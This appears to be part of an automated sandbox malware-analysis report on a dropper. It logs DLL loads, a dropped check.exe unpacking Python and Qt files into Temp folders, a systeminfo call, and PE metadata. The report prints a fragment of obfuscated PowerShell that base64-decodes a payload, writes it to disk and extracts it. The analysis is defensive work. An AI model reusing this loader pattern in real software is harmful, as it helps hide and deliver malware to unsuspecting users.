Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: download.ps1

Static file information: File size 51318168 > 1048576

Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdbBB source: check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\platformthemes\qxdgdesktopportal.pdb source: check.exe, 00000004.00000003.2327593939.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtsvg\plugins\iconusers\qsvgicon.pdb source: check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtsvg\plugins\imageformats\qsvg.pdb source: check.exe, 00000004.00000003.2324494558.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: check.exe, 00000005.00000002.2658803695.00007FFD93267000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: check.exe, 00000004.00000003.2294950852.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: check.exe, 00000005.00000002.2608629534.00007FFD8A8FA000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: check.exe, 00000005.00000002.2641050511.00007FFD8AE36000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: check.exe, 00000005.00000002.2670730924.00007FFDA3875000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdb source: check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qgif.pdb source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtga.pdb source: check.exe, 00000004.00000003.2324612761.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000005.00000002.2674329936.00007FFDA5544000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: check.exe, 00000005.00000002.2608629534.00007FFD8A862000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: check.exe, 00000005.00000002.2674329936.00007FFDA5544000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: check.exe, 00000005.00000002.2608629534.00007FFD8A8FA000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.2307937403.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2676146575.00007FFDA5B95000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qicns.pdb source: check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: check.exe, 00000005.00000002.2675027368.00007FFDA57F3000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb%% source: check.exe, 00000005.00000002.2665925741.00007FFD9DB67000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb source: check.exe, 00000005.00000002.2665925741.00007FFD9DB67000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: check.exe, 00000005.00000002.2672390476.00007FFDA3903000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: check.exe, 00000005.00000002.2673918432.00007FFDA5526000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: check.exe, 00000005.00000002.2671616130.00007FFDA38DB000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbT source: check.exe, 00000005.00000002.2641050511.00007FFD8AE36000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: check.exe, 00000005.00000002.2673588436.00007FFDA5493000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: check.exe, 00000005.00000002.2598607566.00007FFD897AA000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: check.exe, 00000005.00000002.2671616130.00007FFDA38DB000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: check.exe, 00000005.00000002.2672683215.00007FFDA3A8D000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: check.exe, 00000005.00000002.2601086899.00007FFD89DAA000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: check.exe, 00000005.00000002.2670198233.00007FFDA3809000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qwbmp.pdb source: check.exe, 00000004.00000003.2324940975.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: check.exe, 00000005.00000002.2579851249.0000018354DB0000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\libEGL.pdb source: check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: check.exe, 00000005.00000002.2653958490.00007FFD8B608000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.2307774514.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: check.exe, 00000005.00000002.2669412087.00007FFDA37DE000.00000002.00000001.01000000.00000019.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($UDyZHlOD); [System.IO.File]::WriteAllBytes($BMGVEzpq, $UEfePLIx); $ZdJkUpkM=New-Item -ItemType Directory -Path $eqkOQfyq; try { $oPiKwGDx=Expand-Archive -Path $BMGVEzpq -DestinationP

Source: VCRUNTIME140.dll.4.dr

Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]

Source: MSVCP140.dll.4.dr	Static PE information: section name: .didat
Source: Qt5Core.dll.4.dr	Static PE information: section name: .qtmimed
Source: VCRUNTIME140.dll.4.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.4.dr	Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll0.4.dr	Static PE information: section name: _RDATA
Source: opengl32sw.dll.4.dr	Static PE information: section name: _RDATA
Source: qtuiotouchplugin.dll.4.dr	Static PE information: section name: .qtmetad
Source: qsvgicon.dll.4.dr	Static PE information: section name: .qtmetad
Source: qgif.dll.4.dr	Static PE information: section name: .qtmetad
Source: qicns.dll.4.dr	Static PE information: section name: .qtmetad
Source: qico.dll.4.dr	Static PE information: section name: .qtmetad
Source: qjpeg.dll.4.dr	Static PE information: section name: .qtmetad
Source: qsvg.dll.4.dr	Static PE information: section name: .qtmetad
Source: qtga.dll.4.dr	Static PE information: section name: .qtmetad
Source: qtiff.dll.4.dr	Static PE information: section name: .qtmetad
Source: libcrypto-3.dll.4.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.4.dr	Static PE information: section name: .00cfg
Source: python313.dll.4.dr	Static PE information: section name: PyRuntim
Source: qwbmp.dll.4.dr	Static PE information: section name: .qtmetad
Source: qwebp.dll.4.dr	Static PE information: section name: .qtmetad
Source: qminimal.dll.4.dr	Static PE information: section name: .qtmetad
Source: qoffscreen.dll.4.dr	Static PE information: section name: .qtmetad
Source: qwebgl.dll.4.dr	Static PE information: section name: .qtmetad
Source: qwindows.dll.4.dr	Static PE information: section name: .qtmetad
Source: qxdgdesktopportal.dll.4.dr	Static PE information: section name: .qtmetad
Source: qwindowsvistastyle.dll.4.dr	Static PE information: section name: .qtmetad
Source: VCRUNTIME140.dll.6.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.6.dr	Static PE information: section name: _RDATA
Source: MSVCP140.dll.6.dr	Static PE information: section name: .didat
Source: Qt5Core.dll.6.dr	Static PE information: section name: .qtmimed
Source: libcrypto-3.dll.6.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.6.dr	Static PE information: section name: .00cfg
Source: VCRUNTIME140.dll0.6.dr	Static PE information: section name: _RDATA
Source: python313.dll.6.dr	Static PE information: section name: PyRuntim
Source: opengl32sw.dll.6.dr	Static PE information: section name: _RDATA
Source: qtuiotouchplugin.dll.6.dr	Static PE information: section name: .qtmetad
Source: qsvgicon.dll.6.dr	Static PE information: section name: .qtmetad
Source: qgif.dll.6.dr	Static PE information: section name: .qtmetad
Source: qicns.dll.6.dr	Static PE information: section name: .qtmetad
Source: qico.dll.6.dr	Static PE information: section name: .qtmetad
Source: qjpeg.dll.6.dr	Static PE information: section name: .qtmetad
Source: qsvg.dll.6.dr	Static PE information: section name: .qtmetad
Source: qtga.dll.6.dr	Static PE information: section name: .qtmetad
Source: qtiff.dll.6.dr	Static PE information: section name: .qtmetad
Source: qwbmp.dll.6.dr	Static PE information: section name: .qtmetad
Source: qwebp.dll.6.dr	Static PE information: section name: .qtmetad
Source: qminimal.dll.6.dr	Static PE information: section name: .qtmetad
Source: qoffscreen.dll.6.dr	Static PE information: section name: .qtmetad
Source: qwebgl.dll.6.dr	Static PE information: section name: .qtmetad
Source: qwindows.dll.6.dr	Static PE information: section name: .qtmetad
Source: qxdgdesktopportal.dll.6.dr	Static PE information: section name: .qtmetad
Source: qwindowsvistastyle.dll.6.dr	Static PE information: section name: .qtmetad

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Svg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\opengl32sw.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\sip.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platforms\qminimal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qsvg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qwindows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qwebgl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qico.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5Qml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qicns.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qtiff.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	Jump to dropped file
